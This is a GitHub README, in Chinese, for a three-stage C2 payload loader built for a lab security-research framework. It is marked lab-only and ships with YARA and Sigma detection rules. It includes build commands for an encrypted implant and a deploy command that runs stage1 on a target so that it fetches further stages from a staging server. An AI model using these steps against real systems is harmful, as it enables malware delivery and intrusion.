diemoeve/oxide-loader
GitHub: diemoeve/oxide-loader
3 阶段 C2 载荷加载器,为 oxide 安全研究框架提供带检测规则的交付链。
Stars: 2 | Forks: 0
# oxide-loader
3阶段有效载荷交付链,用于 oxide 安全研究框架。
**仅限实验室使用。默认 C2 为 localhost。请参阅 `DISCLAIMER.md`。**
## 阶段
| 阶段 | 语言 | 角色 |
|------|------|------|
| stage1 | C | 通过 HTTP 获取 stage2。< 20 KB。 |
| stage2 | Rust | 反分析检查,获取 stage3。 |
| stage3 | Rust | 解密嵌入式植入体,注入或执行。 |
## 构建
```
cd stage1 && make
cd stage2 && cargo build --release
python3 builder.py \
--implant ../oxide/target/release/oxide-implant \
--psk oxide-lab-psk \
--salt $(cat ../oxide/certs/salt.hex) \
--out-rs stage3/src/payload.rs --rebuild
```
## 部署
将二进制文件上传到 oxide 面板暂存端点,然后在目标上运行 stage1:
```
STAGE_URL=http://10.10.100.1:8080 ./stage1/build/stage1
```
## builder.py
使用 AES-256-GCM(PBKDF2 派生密钥)加密植入体,并生成
`stage3/src/payload.rs` 用于编译时嵌入。
```
python3 builder.py --help
```
## 检测
```
detection/
├── yara/ stage1_magic.yar, stage1_xor.yar, stage1_imports.yar
└── sigma/ stage1_network.yml
```
ATT&CK: T1105, T1497, T1055, T1027。
## 相关项目
- [oxide](https://github.com/diemoeve/oxide) - 植入体 + C2 面板
- [oxide-stealer](https://github.com/diemoeve/oxide-stealer) - 浏览器凭证提取
- [oxide-infra](https://github.com/diemoeve/oxide-infra) - 实验室基础设施(Terraform + Ansible)
标签:AES-256-GCM, C 语言, DNS 反向解析, PBKDF2, Rust, STAGE1, STAGE2, STAGE3, YARA, 三阶段, 云资产可视化, 反分析, 可视化界面, 实验室使用, 密钥交换, 恶意负载, 执行, 披露, 本地 C2, 构建, 检测规则, 植入物, 流量检测, 网络信息收集, 网络流量审计, 网络资产发现, 载荷加载器, 逆向工具, 部署